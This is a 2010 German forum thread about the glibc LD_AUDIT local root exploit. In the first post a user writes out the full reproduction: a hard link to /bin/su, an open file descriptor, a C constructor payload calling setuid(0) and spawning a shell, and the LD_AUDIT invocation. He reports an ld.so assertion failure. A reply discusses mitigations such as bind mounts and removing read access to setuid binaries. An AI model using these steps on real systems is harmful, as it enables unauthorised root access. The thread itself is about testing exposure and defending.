LD_AUDIT-Exploit

19/10/2010 - 17:46 von Markus Wichmann | Report spam
Hi all,

nachdem ich das hier bei fefe gelesen habe:

http://seclists.org/fulldisclosure/2010/Oct/257

wollte ich es mal ausprobieren. Nur muss ich das ganze etwas abwandeln:

/tmp ist bei mir auf einem anderen Dateisystem als /bin, im Gegensatz zu
$HOME, also mache ich das hier in meinem Home:

$ mkdir -v expl
mkdir: created directory `exploit'
$ ln -v /bin/su exploit/target #/bin/ping ist bei mir nicht mehr SUID
`exploit/target' => `/bin/su'
$ exec 3< exploit/target
$ rm -rvf exploit
removed `exploit/target'
removed directory: `exploit'
$ ls -l /proc/$$/fd/3
lr-x 1 markus markus 64 Oct 19 15:14 "/proc/1531/fd/3" ->
"/home/markus/exploit/target (deleted)"
$ cat payload.c
void __attribute((constructor)) _init()
{
setuid(0);
system("/bin/zsh");
}
$ gcc -fPIC -c payload.c
$ ld -shared -I /lib/ld-linux-x86-64.so.2 -o exploit payload.o -lc
$ readelf -d exploit | grep INIT
0x000000000000000c (INIT) 0x308
$ nm exploit | grep 308
0000000000000308 T _init
$ LD_AUDIT='$ORIGIN' /proc/self/fd/3
Inconsistency detected by ld.so: dl-open.c: 231: dl_open_worker:
Assertion `(call_map)->l_name[0] == '\0'' failed!

Hmm... bin ich jetzt gegen diesen Exploit gewappnet oder hab ich einfach
nur was falsch gemacht?

Tschö,
Markus
 

Lesen sie die antworten

#1 Manuel Reimer
20/10/2010 - 13:33 | Warnen spam
Markus Wichmann wrote:
Hmm... bin ich jetzt gegen diesen Exploit gewappnet oder hab ich einfach
nur was falsch gemacht?



Welche Distribution? Gentoo ist z.B. scheinbar sicher, weil "others"
kein Leserecht auf setuid-root-Binaries hat?
https://bugs.gentoo.org/show_bug.cgi?id41755
Allerdings sehe ich in Kommentar 3 gerade, dass diese Äußerung eventuell
nicht ganz ernst zu nehmen ist...

Als schnelle "quick and dirty"-Lösung habe ich mir einige bind-mounts in
die fstab gebaut, dass alle Bereiche, in die Benutzer üblicherweise
schreiben können, für den Kernel wie eigene Volumes aussehen. Das mir
dem leserecht für setuid-root-Binaries rüste ich heute auf allen von mir
verwalteten Systemen noch nach.

.. und dann hoffe ich natürlich, dass die Distributoren bald mal
Patches bereitstellen...

Gruß

Manuel

"Alle Macht geht vom Volk aus - aber wo geht sie hin?" - Bertolt Brecht
Alle wollen zurück zur Natur - aber keiner zu Fuß
Beitràge mit *X-No-Html Header* kann ich weder lesen, noch beantworten!

Ähnliche fragen